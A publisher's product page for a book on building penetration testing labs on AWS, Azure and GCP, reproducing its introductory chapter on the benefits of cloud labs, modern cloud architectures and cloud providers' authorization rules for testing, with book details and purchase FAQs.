Search icon
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletters
Free Learning
Arrow right icon
Building and Automating Penetration Testing Labs in the Cloud
Building and Automating Penetration Testing Labs in the Cloud

Building and Automating Penetration Testing Labs in the Cloud: Set up cost-effective hacking environments for learning cloud security on AWS, Azure, and GCP

By Joshua Arvin Lat
R$222.99 R$80.00
Book Oct 2023 562 pages 1st Edition
eBook
R$222.99 R$80.00
Print
R$278.99
Subscription
Free Trial
eBook
R$222.99 R$80.00
Print
R$278.99
Subscription
Free Trial

What do you get with eBook?

Product feature icon Instant access to your Digital eBook purchase
Product feature icon Download this book in EPUB and PDF formats
Product feature icon Access this title in our online reader with advanced features
Product feature icon DRM FREE - Read whenever, wherever and however you want
Buy Now

Product Details


Publication date : Oct 13, 2023
Length 562 pages
Edition : 1st Edition
Language : English
ISBN-13 : 9781837632398
Category :
Table of content icon View table of contents Preview book icon Preview Book

Building and Automating Penetration Testing Labs in the Cloud

Getting Started with Penetration Testing Labs in the Cloud

The demand for cloud security professionals continues to increase as the number of cloud-related threats and incidents rises significantly every year. To manage the risks involved when learning cloud penetration testing and ethical hacking, security engineers seeking to advance their careers would benefit from having a solid understanding of how to set up penetration testing environments in the cloud.

In this introductory chapter, we will quickly go through the benefits of setting up penetration testing labs in the cloud. We will explore how modern cloud applications are designed, developed, and deployed as this will be essential when we build penetration testing labs in the succeeding chapters. In the final section of this chapter, we’ll delve deeper into several relevant factors to consider when designing and building vulnerable cloud infrastructures.

That said, we will cover the following topics:

  • Why build your penetration testing labs in the cloud?
  • Recognizing the impact of cloud computing on the cybersecurity landscape
  • Exploring how modern cloud applications are designed, developed, and deployed
  • Examining the considerations when building penetration testing lab environments in the cloud

With these in mind, let’s get started!

Why build your penetration testing labs in the cloud?

At some point in their careers, security professionals may build penetration testing labs where they can practice their skills safely in an isolated environment. At this point, you might be asking yourself: What’s inside a penetration testing lab environment?

Figure 1.1 – Penetration testing lab example

In Figure 1.1, we can see that a penetration testing lab environment is simply a controlled environment that hosts several vulnerable-by-design applications and services. These applications have known vulnerabilities and misconfigurations that can be exploited using the right set of tools and techniques. These vulnerabilities are incorporated to provide a realistic environment for penetration testers to practice and simulate real-world attack scenarios. In addition to this, security researchers and penetration testers can dive deeper into various attack vectors, explore new techniques for exploitation, and develop countermeasures.

Before going over the benefits of setting up our penetration testing labs in the cloud, let’s discuss why having a penetration testing lab environment is a great idea. Here are some of the reasons why it is recommended to have a penetration testing lab environment:

  • Learning penetration testing in a dedicated lab environment helps you stay away from legal trouble. Attacking a system owned by another person or company is illegal without a contract, consent, or agreement.
  • Given that penetration tests may corrupt data, crash servers, and leave environments in an unstable state, having a separate penetration testing lab will help ensure that production environments are not affected by the possible side effects of penetration test simulations.
  • We may also use these lab environments while developing custom penetration testing tools to automate and speed up certain steps in the penetration testing process.
  • We can also practice defense evasion in these environments by setting up various defense mechanisms that could detect and block certain types of attacks.
  • We can hack lab environments to teach the fundamentals of penetration testing to security enthusiasts and beginners.
  • Penetration testing labs can be used to validate a newly disclosed vulnerability. These isolated environments can also be used to verify whether a previously known vulnerability has already been remediated after an update, a configuration change, or a patch has been applied.

Now that we have discussed why it is a good idea to have a penetration testing lab environment, it’s about time we talk about where we can host these hacking labs. In the past, most security practitioners set up their lab environments primarily on their local machines (for example, their personal computer or laptop). They invested in dedicated hardware where they can run virtual lab environments using VirtualBox or other alternative virtualization software:

Figure 1.2 – Running penetration testing lab environments on your local machine

In Figure 1.2, we can see that a common practice in home lab environments involves creating snapshots (used to capture the current state) before tests are performed since certain steps in the penetration testing process may affect the configuration and stability of the target machine. These snapshots can then be used to revert and restore the setup to its original state so that security professionals and researchers can perform a series of tests and experiments without having to worry about the side effects of the previous tests.

Note

In the past, one of the common targets that was set up in penetration testing lab environments was an intentionally vulnerable Linux image called Metasploitable. It contained various vulnerable running services mapped to several open ports waiting to be scanned and attacked. Practitioners would then set up an attacker machine using BackTrack Linux (now known as Kali Linux) that had been configured with a variety of tools, such as Nmap and Metasploit, to attack the target machine.

Of course, setting up a vulnerable-by-design lab environment on our local machines has its own set of challenges and limitations. These may include one or more of the following:

  • Setting up a penetration testing lab environment on our personal computer or laptop (most likely containing personal and work files) may have unintended consequences as the entire system might be compromised if the hacking lab environment is set up incorrectly. In the worst case, we might lose all our files when the system crashes completely due to hardware degradation or failure.
  • Virtual machines that are used in the lab environment can be resource-hungry. That said, we may be required to have a more expensive local setup to meet the demands of the virtual machines that are running.
  • Setting up a vulnerable lab environment can be time-consuming and may require prior knowledge of the tools and applications involved. The process of configuring and preparing the necessary components for a lab environment, such as vulnerable software or network setups, can be complex and demanding. It is essential to have a good understanding of the tools and their dependencies, which can be a limitation for those who are new to the field or have limited experience.
  • Certain vulnerabilities and misconfigurations may be hard to test, especially those that involve the usage and presence of a cloud service.

Note

In some cases, we may also encounter licensing issues that prevent us from using certain virtual machines, operating systems, and applications in our hacking lab environment.

To solve one or more of the challenges mentioned, it is a good idea to consider setting up our penetration testing labs in the cloud. Here are some of the advantages when setting up cloud penetration testing labs:

  • Lab environments hosted in the cloud may be closer to what actual production environments deployed in the cloud look like
  • We can manage costs significantly by having our hacking lab environment running in the cloud for a few hours and then deleting (or turning off) the cloud resources after the tests and experiments are finished
  • Setting up the cloud lab environment ourselves will help us have a deeper understanding of the implementation and security configuration of the cloud resources deployed in the penetration testing lab environment
  • It is easier to grow the complexity of vulnerable lab environments in the cloud since resources can be provisioned right away without us having to worry about the prerequisite hardware requirements
  • Certain attacks are difficult to simulate locally but are relatively simple to carry out in cloud environments (for example, attacks on cloud functions, along with other serverless resources)
  • Setting up complex lab environments in the cloud may be faster with the help of automation tools, frameworks, and services
  • We don’t have to worry about the personal and work files stored on our local machine being deleted or stolen
  • It is easier to have multiple users practice penetration testing in hacking lab environments deployed in the cloud

Note

In addition to these, learning penetration testing can be faster in the cloud. For one thing, downloading large files and setting up vulnerable VMs can be significantly faster in the cloud. In addition to this, rebuilding cloud environments is generally easier since there are various options to recreate and rebuild these lab environments.

At this point, we should know why it is a great idea to build our penetration testing lab environments in the cloud! In the next section, we’ll quickly discuss how cloud computing has influenced and shaped the modern cybersecurity landscape.

Recognizing the impact of cloud computing on the cybersecurity landscape

In the past, companies had to host their applications primarily in their data centers. Due to the operational overhead of managing their own data centers, most businesses have considered migrating their data and their workloads to the cloud. Some organizations have moved all their applications and data to the cloud, while others use a hybrid cloud architecture to host their applications in both on-premises data centers and in the cloud. Cloud computing has allowed companies to do the following:

  • Ensure continuous operations: High availability in the cloud ensures that applications and services remain accessible and operational, even in the event of failures or disruptions. By leveraging redundancy and fault-tolerant architectures offered by cloud providers, downtime is minimized, and uninterrupted access to resources is maintained.
  • Save money: No hardware infrastructure investment is needed to get started as cloud resources can be created and deleted within seconds or minutes. In addition to this, cloud platforms generally have a pay-per-use model for the usage of cloud resources.
  • Easily manage application workloads: Application workloads in the cloud can be managed remotely. In addition to this, resources can be scaled up and down easily, depending on what the business needs.
  • Easily manage data: Managing data becomes more streamlined and convenient in the cloud environment due to the availability of a wide range of services, features, and capabilities. Additionally, the virtually unlimited storage capacity offered by the cloud eliminates concerns related to handling large files. This enhanced data management capability in the cloud contributes to improved efficiency and scalability for companies.
  • Automate relevant processes: Building automated pipelines and workflows in the cloud is easier since most of the cloud services can be managed through application programming interfaces (APIs) and software development kits (SDKs).

With more companies storing their data in the cloud, there has been a significant increase in cloud attacks in the last couple of years. The attack surface has changed due to the rise of cloud computing, and along with it, the types of attacks have changed. Hackers can take advantage of vulnerable and misconfigured cloud resources, which could end up having sensitive data stored in the cloud stolen.

What do we mean by attack surface?

Attack surface refers to the collective set of potential vulnerabilities within a system that can be exploited by attackers. It encompasses various elements, including network interfaces, APIs, user access points, operating systems, and deployed cloud resources. Understanding and managing the attack surface is crucial for assessing and mitigating security risks in the cloud as it allows organizations to identify and address potential weak points that could be targeted by malicious actors.

With this in mind, here is a quick list of relevant cyberattacks on cloud-based data and applications:

  • Attacks on vulnerable application servers and misconfigured cloud storage resources: Attacks on vulnerable and misconfigured cloud resources such as APIs, virtual machines, CI/CD pipelines, and storage resources have resulted in serious data breaches around the world. Identities and information stolen from data breaches are used for identity theft and phishing.
  • Ransomware attacks in the cloud: Sensitive data stored in the cloud is constantly being targeted by hackers. Ransomware victims are generally asked to pay the ransom in Bitcoin or other cryptocurrencies. Bitcoin and other cryptocurrencies let users maintain their anonymity. This, along with other techniques, makes it hard for authorities to track down ransomware hackers.
  • Cloud account hijacking: Once a hacker takes over an organization’s cloud account, the hacker can freely spin up resources, access sensitive files, and use resources inside the account to attack other companies and accounts.
  • Distributed Denial-of-Service (DDoS) and Denial-of-Wallet (DoW) attacks: During a DDoS attack, an attacker seeks to make an online service unavailable by overwhelming and flooding deployed cloud resources with generated traffic. During a DoW attack, similar techniques are used to inflict financial damage (due to a large bill).

Over the years, the quantity and quality of tools focusing on cloud security have increased as cloud security threats have evolved and become more widespread. More security tools and utilities became available as the number of disclosed vulnerabilities increased every year. These tools ranged from simple scripts to sophisticated frameworks and modules that can be configured to suit the needs of an attacker. Security professionals have seen tools and products evolve over time as well. In the past, cloud security products needed to be installed and set up by the internal teams of companies. These past few years, more managed cloud-based tools and services became available, most of which can be used immediately with minimal configuration. Here are some of the more recent security solutions that have become available for cloud security:

  • Various offensive security cloud tools and frameworks
  • Agentless vulnerability assessment tools for virtual machines in the cloud
  • Vulnerability assessment tools for container images
  • Vulnerability assessment tools and services for serverless compute resources
  • Machine learning-powered code security scanner tools and services
  • Cloud network security audit tools
  • Managed cloud firewalls
  • Managed cloud threat detection services
  • Artificial intelligence-powered security tools

At this point, we should have a better understanding of how cloud computing has shaped and influenced the cybersecurity landscape. In the next section, we will dive deeper into how modern applications are designed, developed, and deployed in the cloud.

Exploring how modern cloud applications are designed, developed, and deployed

One of the primary objectives when building our penetration testing labs is to prepare a vulnerable-by-design environment that mimics real cloud environments. That said, we must have a good understanding of how modern cloud applications look as this will equip us with the knowledge required to build the right environment for our needs.

Years ago, most applications that were deployed in the cloud were designed and developed as monolithic applications. This means that the frontend, backend, and database layers of the application’s architecture were built together as a single logical unit. Most of the time, multiple developers would work on a single code repository for a project. In addition to this, the entire application, along with the database, would most likely be deployed together as a single unit inside the same server or virtual machine (similar to what’s shown in the simplified diagram in Figure 1.3):

Figure 1.3 – Deployment of monolithic applications (simplified)

From a security standpoint, an attacker that’s able to get root access to the virtual machine hosting the application server would most likely be able to access and steal sensitive information stored in the database running on the same machine.

What do we mean by root access?

Root access refers to having complete administrative privileges and unrestricted control over a computer system or virtual machine. It grants the user the highest level of access and authority, enabling them to modify system files, install or uninstall software, and perform actions that are typically restricted to other users. In the context of security, if an attacker obtains root access to a virtual machine hosting an application server, it implies they have gained full control of the system. This can potentially lead to unauthorized access to sensitive data stored in databases residing on the same machine.

Of course, there are modern applications that are still designed and architected as monolithic applications due to the benefits of having this type of architecture. However, as we will see shortly, more teams around the world are starting with a distributed microservice architecture instead of a monolithic setup. One of the notable downsides of having a monolithic architecture is that development teams may have problems scaling specific layers of the application once more users start to use the system. Once the application starts to slow down, teams may end up vertically scaling the virtual machine where the application is running. With vertical scaling, the resources of a single server, such as CPU and RAM, are increased by upgrading its hardware or adding more powerful machines. This approach allows the server to handle higher workloads and demands by enhancing its capacity. In contrast, horizontal scaling involves adding more servers to distribute the load, allowing each server to handle a portion of the overall traffic. Given that vertical scaling is generally more expensive than horizontal scaling long-term, cloud architects recommend having a distributed multi-tier setup instead since horizontal scaling involves scaling only the infrastructure resources hosting the components of the application that require scaling.

For instance, in a distributed e-commerce application, instead of vertically scaling a single monolithic server to handle increased user traffic, the system can be designed with separate tiers for the web servers, application servers, and databases. By separating different tiers, it becomes possible to independently scale each tier based on its specific resource demands. For example, while the application server layer can scale horizontally to handle increased user traffic, the database layer can scale vertically to accommodate growing data storage requirements. This way, when traffic surges, the infrastructure can horizontally scale by adding more web servers to handle the increased load, resulting in a more cost-effective and scalable solution:

Figure 1.4 – Autoscaling setup

In addition to this, a distributed multi-tier setup can easily support the autoscaling of resources due to its inherent architectural design. This flexibility allows the system to automatically adjust resource allocation without manual intervention, ensuring optimal performance and resource utilization. If the traffic that’s received by the application is spiky or unpredictable, a cloud architect may consider having an autoscaling setup for specific layers of the application to ensure that the infrastructure resources hosting the application are not underutilized.

Note

Security professionals must take into account that the downsizing operation of an autoscaling setup may delete resources automatically once the traffic received by the application goes down. It is important to note that misconfigured or incomplete autoscaling implementations generally do not have the recommended log rotation setup configured properly in production environments. This would make investigation harder since the logs stored in the compromised infrastructure resources or servers might be deleted during the automated downsizing operation.

At this point, we should have a good idea of how the initial cloud applications were designed and deployed. Fast forwarding to the present, here’s what a modern application may look like:

Figure 1.5 – What a modern cloud architecture looks like

Wow! That escalated quickly! In Figure 1.5, we can see that in addition to what was discussed already, modern application architectures may have one or more of the following as well:

  • Usage of Infrastructure as Code (IaC) solutions to automatically provision cloud resources: While building a modern cloud application, an organization could utilize IaC solutions to streamline the provisioning of cloud resources. For example, they might employ tools such as Terraform or AWS CloudFormation, defining their infrastructure requirements in code to automatically provision and configure resources such as virtual machines, storage, networking, and load balancers.
  • Usage of managed container services to ease the management of Kubernetes clusters: A company may opt to utilize managed container services to simplify the management of their Kubernetes clusters. For example, they could choose a managed Kubernetes service provided by a cloud platform, which would handle tasks such as cluster provisioning, scaling, and monitoring. This allows the company to focus on developing and deploying its application without the overhead of managing the underlying Kubernetes infrastructure.
  • A continuous integration and continuous deployment (CI/CD) pipeline: A company could set up a CI/CD pipeline to automate the process of integrating code changes, running tests, and deploying the application to the cloud. Developers would commit their code changes to a version control system, triggering an automated build process that compiles the code, runs tests, and generates artifacts. The CI/CD pipeline would then deploy the application to a staging environment for further testing and, upon successful validation, automatically promote it to a production environment.
  • Function-as-a-Service (FaaS) resources: An organization implementing a modern cloud application could utilize FaaS resources as part of their solution. For instance, they might design the application to leverage serverless functions to handle specific tasks or workflows. By breaking down the application into smaller, independent functions, the company can achieve greater scalability, reduce operational overhead, and improve resource utilization.
  • APIs consumed by web and mobile applications: A company could adopt a microservices architecture, where APIs are designed and exposed to be consumed by both web and mobile applications. In this scenario, the company would develop individual microservices that encapsulate specific functionalities and expose well-defined APIs. These APIs would then be consumed by the web and mobile applications. With this setup, there would be seamless communication and interaction between the frontend clients and the backend services.
  • Usage of managed firewalls and load balancers: An organization can leverage existing managed firewall services and solutions provided by their cloud provider, which would allow them to define and enforce security policies at the network level. In addition to this, they could utilize a load balancer service to distribute incoming traffic across multiple instances of their application. This will help ensure the scalability and high availability of modern cloud systems while removing the need to manage the underlying infrastructure and operating systems of these managed cloud resources.
  • Usage of artificial intelligence (AI) and machine learning (ML) services: A company implementing a modern cloud application could utilize AI-powered and ML-powered services by leveraging pre-trained models and APIs. For example, they could utilize an AI service for sentiment analysis to analyze customer feedback and improve user experience. In addition to this, they could also employ managed ML services for predictive analytics to enhance decision-making processes within the application.

There has also been an observable shift in the use of more managed services globally as more companies migrate their workloads to the cloud. The managed services provided by cloud platforms have gradually replaced specific components in the system that were originally maintained manually by a company’s internal system administration team. For instance, companies are leveraging managed services such as Google Cloud Pub/Sub instead of setting up their own messaging systems such as RabbitMQ. This approach allows organizations to focus their valuable time and resources on other critical business requirements.

With managed services, a major portion of the maintenance work is handled and automated by the cloud platform instead of a company’s internal team members. Here are some of the advantages when using managed services:

  • Server security patches and operational maintenance work is handled internally by the cloud platform when using managed services. This allows the company’s internal team members to use their precious time to work on other important requirements. A good example would be Amazon SageMaker, where data scientists and ML engineers can concentrate on training and deploying ML models without having to worry about manual maintenance tasks.
  • Scaling is generally easier when using managed services as a resource launch can easily be modified and scaled with an API call or through a user interface. In some cases, resources can easily have auto-scaling configured. When it comes to scaling, Azure Kubernetes Service (AKS) would be a great example as it enables easy resource scaling and adjustment of the number of pods running in the cluster.
  • Generally, cloud resources that are deployed have reliable monitoring and management tools installed already. In addition to this, the integration with other services from the same cloud platform is seamless and immediately available. At the same time, managed cloud services and resources usually have built-in practical automation features that are immediately available for use.

Note

Security professionals need to have a good idea of what’s possible and what’s not when managed services are used. For example, we are not able to access the underlying operating system of certain managed services as these were designed and implemented that way. A good example would be the managed NAT Gateway of the AWS cloud platform. In addition to this, security professionals need to be aware of other possible mechanisms available when using managed services. For example, in Amazon Aurora (a relational database management system built for the cloud), we also have the option to do passwordless authentication using an Identity and Access Management (IAM) role. This means that if an attacker manages to exfiltrate AWS credentials with the right set of permissions, the database records can be accessed and modified even without the database’s username and password.

There has been a significant increase in the usage of containers these last couple of years. If you are wondering what containers are, containers are simply lightweight, isolated environments that package applications and their dependencies to guarantee consistency and portability. Container images, on the other hand, act as self-contained executable packages, comprising the necessary files and configurations for running specific applications. Companies opt for containers because they offer quicker launch times and the capability to host multiple containers in one virtual machine and ensure consistent environments throughout various development stages. Initially, companies were hesitant in using Docker containers for deployment in production. However, due to the latest advances and release of production-ready tools such as Kubernetes, Docker Compose, and other similar container frameworks, more companies around the world have been using containers to host applications.

At this point, you might be wondering, What are the advantages of using containers? Here are a few reasons why companies would opt to utilize containers:

  • Launching new containers from container images is generally faster compared to creating new virtual machines and servers from images. This is because containers leverage lightweight virtualization and share the host system’s operating system, allowing them to start quickly without the need to boot an entire operating system. In addition to this, containers only require the necessary dependencies and libraries specific to the application, resulting in smaller image sizes and faster deployment times.
  • We can have multiple containers running inside a virtual machine. Having the ability to run multiple containers inside a virtual machine offers significant benefits in terms of resource utilization and scalability. Each container operates independently, allowing for processes and services to be isolated while sharing the underlying resources of the virtual machine. This enables efficient utilization of computing resources as multiple containers can run concurrently on the same hardware, optimizing the utilization of CPU, memory, and storage.
  • Using containers allows for seamless consistency across different environments, such as local development, staging, and production. With containerization, developers can package all necessary dependencies and configurations, ensuring that the application runs consistently across these environments. This approach promotes early consideration of environment consistency, enabling developers to detect and address any compatibility or deployment issues at an earlier stage in the development life cycle, leading to smoother deployments and reduced chances of environment-related errors.

In addition to these, nowadays, more managed cloud services already provide support for the usage of custom container environments, which gives developers the flexibility they need while ensuring that minimal work is done on the maintenance end. By leveraging these managed cloud services, developers can focus on application development and innovation while offloading the burden of infrastructure maintenance and ensuring optimal performance, scalability, and security for their containerized applications.

Note

Imagine a company developing a microservices-based application. By leveraging containers, they can encapsulate each microservice within its own container, allowing for independent development, testing, and deployment. This modular approach enables teams to iterate and update specific services without impacting the entire application stack. Furthermore, containers facilitate seamless scaling as demand fluctuates. When the application experiences increased traffic, container orchestration platforms such as Kubernetes automatically spin up additional instances of the required containers, ensuring optimal performance and resource utilization. This scalability allows businesses to efficiently handle peak loads without overprovisioning infrastructure.

That said, having a solid understanding of container security is critical due to the growing popularity of containers. Containers present unique security challenges that must be addressed to protect applications and data. By implementing effective container security measures, organizations can mitigate risks (such as unauthorized access, data breaches, and container breakouts) to ensure the security of critical systems and sensitive information.

Similar to containers, there’s also been a noticeable increase in the usage of FaaS services in the past couple of years. FaaS options from major cloud platforms, including AWS Lambda Functions, Azure Functions, and Google Cloud Functions, allow developers and engineers to deploy and run custom application code inside isolated environments without having to worry about server management. Previously, developers had to handle server provisioning and configuration. However, with serverless functions, developers can focus on writing and deploying custom application code without worrying about infrastructure, resulting in a more efficient and streamlined development process. This shift enables rapid iteration, scalable deployments, and reduced operational overhead, significantly simplifying the lives of developers. Using these along with the other building blocks of event-driven architectures, developers can divide complex application code into smaller and more manageable components. To have a better understanding of how these services work, let’s quickly discuss some of the common properties of these cloud functions:

  • Scaling up and down is automatic
  • Usage follows a pay-per-use model
  • The runtime environment gets created and deleted when a function is invoked
  • No maintenance is needed since the cloud platform takes care of the maintenance work
  • There are resource limits on maximum execution time, memory, storage, and code package size
  • Functions are triggered by events

Important note

The terms FaaS and serverless computing are sometimes used interchangeably by professionals. However, they are two different concepts. FaaS primarily focuses on having a platform that speeds up the development and deployment of application code functions. On the other hand, serverless computing refers to the cloud computing execution model, which is generally characterized by the usage of event-driven architecture, managed services, along with per-usage billing. That said, it is possible to have a serverless implementation without utilizing a FaaS service (for example, a frontend-only single-page application (SPA) hosted using the static website hosting capability of a cloud storage service).

How is this relevant to cloud security and penetration testing? The design and implementation of cloud functions impact and influence the offensive and defensive security strategies of professionals. Developers and engineers need to make sure that the code that’s deployed inside cloud functions is safe from a variety of injection attacks. For one thing, creating a file and saving it inside a storage bucket with a filename that includes a malicious payload may trigger command execution once an event triggers the cloud function. In addition to this, security professionals must find alternative ways of maintaining persistence (after a successful breach) when dealing with cloud functions since the runtime environment gets created and deleted in seconds.

At this point, you should have a good idea of what modern cloud applications look like! There is a lot more we could discuss in this section, but this should do the trick for now. With everything we have learned so far, we can now proceed with diving deeper into what we should consider when designing and building penetration testing lab environments in the cloud.

Examining the considerations when building penetration testing lab environments in the cloud

In the succeeding chapters of this book, we will be designing and building multiple vulnerable-by-design labs in the cloud. After setting up each of the lab environments, we will simulate the penetration testing process to validate if the vulnerabilities present are exploitable. Before performing a penetration testing session in our cloud environments, we must be aware of the following:

  • What activities are allowed without notification or authorization
  • Whether the attack traffic will pass through the public internet
  • Whether we will perform network stress-testing
  • How our penetration testing lab environment looks like
  • What activities we will perform inside the environment
  • Whether we are testing the security of an application inside a server or we are testing the security of the configuration of a cloud service

In addition to these, we must be aware of the activities and actions prohibited by the cloud platforms. Here are a few examples of what’s not allowed in cloud environments:

  • Attempting social engineering attacks on employees of the cloud platforms
  • Attacking resources and trying to gain access to data owned by other account owners and users
  • Using cloud services in a way that goes against a platform’s Acceptable Use Policy and Terms of Service

Note that there’s a long list of prohibited actions and activities in the relevant documentation pages available online for each of the cloud platforms. You can find the relevant links to resources on the succeeding pages and the Further reading section of this chapter.

We must also notify and contact the respective support and security teams of the cloud platform when needed. This will guarantee that we will not be breaking any rules, especially if we are unsure or if it is our first-time performing penetration tests in the cloud.

Note

The best practice is to notify the cloud platform ahead of time to get authorization and approval. In some cases, an approval or notification is not required but filing a support ticket before performing penetration tests on your resources won’t hurt.

On some occasions, you might think that you no longer need to get authorization from the cloud provider since your penetration testing session will not harm other customers. However, this is not always the case as there might be actions that still require authorization from the cloud provider. Figure 1.6 shows a sample penetration testing lab environment on AWS:

Figure 1.6 – Sample penetration testing lab environment setup

This lab environment has the following components:

  • An attacker machine inside a VPC that prevents all outbound connections
  • A target machine that contains vulnerable applications and services
  • A VPC peering connection that allows traffic between the VPCs where the attacker and target EC2 instances are hosted (so that the attack traffic will pass through this VPC peering connection)
  • An S3 bucket containing files accessed via Private Link

Performing penetration tests on an application running inside an EC2 instance requires no approval. On the other hand, performing penetration tests on your own S3 bucket in your AWS account is not allowed unless you get approval from AWS. Why? Performing penetration tests on an S3 bucket you own differs from penetration tests on an application hosted on S3. You must complete the Simulated Events Form and provide the required information to get authorization from AWS before performing penetration testing simulations on Amazon S3, along with other services not listed under Permitted Services of the Customer Service Policy for Penetration Testing information page. Make sure you check out the following links before performing penetration tests on AWS:

It is important to note that penetration testing policies and guidelines differ across cloud platforms. Here are some of the resources and links you need to check before performing penetration tests on Azure:

Here are the relevant resources and links for GCP:

Note

Note that these policies and guidelines may change in the future, so make sure you review the guidelines before doing penetration tests on applications running in a cloud environment. Make sure you reach out to the support and security teams of the cloud platforms for guidance if you have questions and need clarification.

In addition to what has been discussed already, there are other things we need to consider, particularly in terms of security and engineering:

  • The performance requirements when choosing the cloud infrastructure resources needed for the lab: When building penetration testing lab environments in the cloud, it is crucial to consider the performance requirements and select the appropriate cloud infrastructure resources. This involves assessing factors such as network bandwidth, computational power, and storage capabilities to ensure the lab environment can effectively simulate real-world scenarios and handle the resource-intensive nature of security testing.
  • The overall cost of setting up, running, and maintaining the penetration lab: The cost of establishing, operating, and maintaining a penetration testing lab environment in the cloud should be considered in the context of security and engineering. This includes expenses related to resource provisioning, infrastructure management, and ongoing monitoring and updates.
  • The security and auditability of the environment as the penetration testing lab must be protected from unwarranted external attacks: When building penetration testing lab environments in the cloud, ensuring the security and auditability of the environment is critical. It is crucial to protect the lab from unwarranted external attacks by implementing robust security measures and controls. This includes utilizing security features offered by the cloud platform, such as network segmentation, access controls, and monitoring, to create a secure and auditable testing environment.
  • The scalability and modularity of the lab environment: Making lab environments scalable and modular allows you to efficiently customize the lab for a variety of scenarios and requirements, allowing penetration testers to effectively simulate and evaluate diverse attack scenarios.
  • The manageability of the lab versions: Utilizing version control systems and tools allows penetration testers to efficiently manage and track changes made to the lab environment configurations, software versions, and custom scripts. This ensures that the lab versions are easily maintainable and reproducible and can be rolled back or updated as needed.
  • The use of automation tools and services for fast rebuilds and setup: By leveraging automation, penetration testers can focus more on the actual testing and analysis rather than spending significant time on manual setup and maintenance tasks.

We could add a few more to this list, but these considerations should do for now. We will discuss these security and engineering considerations in detail in the next few chapters as we build a variety of vulnerable-by-design lab environments across the different cloud platforms.

Summary

In this chapter, we started with a quick discussion on the advantages of setting up a penetration testing lab in the cloud. We took a closer look at how cloud computing has influenced and shaped the modern cybersecurity landscape. We also explored how modern cloud applications are designed, developed, and deployed. We wrapped up this chapter by diving deeper into several important considerations when designing and building vulnerable environments in the cloud.

In the next chapter, we will proceed with setting up our first vulnerable lab environment in the cloud. After setting up our penetration testing lab, we will validate whether the vulnerabilities are exploitable using various offensive security tools and techniques.

Further reading

For more information on the topics covered in this chapter, feel free to check out the following resources:

Left arrow icon Right arrow icon
Download code icon Download Code

Key benefits

  • Explore strategies for managing the complexity, cost, and security of running labs in the cloud
  • Unlock the power of infrastructure as code and generative AI when building complex lab environments
  • Learn how to build pentesting labs that mimic modern environments on AWS, Azure, and GCP
  • Purchase of the print or Kindle book includes a free PDF eBook

Description

The significant increase in the number of cloud-related threats and issues has led to a surge in the demand for cloud security professionals. This book will help you set up vulnerable-by-design environments in the cloud to minimize the risks involved while learning all about cloud penetration testing and ethical hacking. This step-by-step guide begins by helping you design and build penetration testing labs that mimic modern cloud environments running on AWS, Azure, and Google Cloud Platform (GCP). Next, you’ll find out how to use infrastructure as code (IaC) solutions to manage a variety of lab environments in the cloud. As you advance, you’ll discover how generative AI tools, such as ChatGPT, can be leveraged to accelerate the preparation of IaC templates and configurations. You’ll also learn how to validate vulnerabilities by exploiting misconfigurations and vulnerabilities using various penetration testing tools and techniques. Finally, you’ll explore several practical strategies for managing the complexity, cost, and risks involved when dealing with penetration testing lab environments in the cloud. By the end of this penetration testing book, you’ll be able to design and build cost-effective vulnerable cloud lab environments where you can experiment and practice different types of attacks and penetration testing techniques.

What you will learn

Build vulnerable-by-design labs that mimic modern cloud environments Find out how to manage the risks associated with cloud lab environments Use infrastructure as code to automate lab infrastructure deployments Validate vulnerabilities present in penetration testing labs Find out how to manage the costs of running labs on AWS, Azure, and GCP Set up IAM privilege escalation labs for advanced penetration testing Use generative AI tools to generate infrastructure as code templates Import the Kali Linux Generic Cloud Image to the cloud with ease

What do you get with eBook?

Product feature icon Instant access to your Digital eBook purchase
Product feature icon Download this book in EPUB and PDF formats
Product feature icon Access this title in our online reader with advanced features
Product feature icon DRM FREE - Read whenever, wherever and however you want
Buy Now

Product Details


Publication date : Oct 13, 2023
Length 562 pages
Edition : 1st Edition
Language : English
ISBN-13 : 9781837632398
Category :

Table of Contents

15 Chapters
Preface Chevron down icon Chevron up icon
Part 1: A Gentle Introduction to Vulnerable-by-Design Environments Chevron down icon Chevron up icon
Chapter 1: Getting Started with Penetration Testing Labs in the Cloud Chevron down icon Chevron up icon
Chapter 2: Preparing Our First Vulnerable Cloud Lab Environment Chevron down icon Chevron up icon
Chapter 3: Succeeding with Infrastructure as Code Tools and Strategies Chevron down icon Chevron up icon
Part 2: Setting Up Isolated Penetration Testing Lab Environments in the Cloud Chevron down icon Chevron up icon
Chapter 4: Setting Up Isolated Penetration Testing Lab Environments on GCP Chevron down icon Chevron up icon
Chapter 5: Setting Up Isolated Penetration Testing Lab Environments on Azure Chevron down icon Chevron up icon
Chapter 6: Setting Up Isolated Penetration Testing Lab Environments on AWS Chevron down icon Chevron up icon
Part 3: Exploring Advanced Strategies and Best Practices in Lab Environment Design Chevron down icon Chevron up icon
Chapter 7: Setting Up an IAM Privilege Escalation Lab Chevron down icon Chevron up icon
Chapter 8: Designing and Building a Vulnerable Active Directory Lab Chevron down icon Chevron up icon
Chapter 9: Recommended Strategies and Best Practices Chevron down icon Chevron up icon
Index Chevron down icon Chevron up icon
Other Books You May Enjoy Chevron down icon Chevron up icon

Customer reviews

Filter icon Filter
Top Reviews
Rating distribution
Empty star icon Empty star icon Empty star icon Empty star icon Empty star icon 0
(0 Ratings)
5 star 0%
4 star 0%
3 star 0%
2 star 0%
1 star 0%

Filter reviews by


No reviews found
Get free access to Packt library with over 7500+ books and video courses for 7 days!
Start Free Trial

FAQs

How do I buy and download an eBook? Chevron down icon Chevron up icon

Where there is an eBook version of a title available, you can buy it from the book details for that title. Add either the standalone eBook or the eBook and print book bundle to your shopping cart. Your eBook will show in your cart as a product on its own. After completing checkout and payment in the normal way, you will receive your receipt on the screen containing a link to a personalised PDF download file. This link will remain active for 30 days. You can download backup copies of the file by logging in to your account at any time.

If you already have Adobe reader installed, then clicking on the link will download and open the PDF file directly. If you don't, then save the PDF file on your machine and download the Reader to view it.

Please Note: Packt eBooks are non-returnable and non-refundable.

Packt eBook and Licensing When you buy an eBook from Packt Publishing, completing your purchase means you accept the terms of our licence agreement. Please read the full text of the agreement. In it we have tried to balance the need for the ebook to be usable for you the reader with our needs to protect the rights of us as Publishers and of our authors. In summary, the agreement says:

  • You may make copies of your eBook for your own use onto any machine
  • You may not pass copies of the eBook on to anyone else
How can I make a purchase on your website? Chevron down icon Chevron up icon

If you want to purchase a video course, eBook or Bundle (Print+eBook) please follow below steps:

  1. Register on our website using your email address and the password.
  2. Search for the title by name or ISBN using the search option.
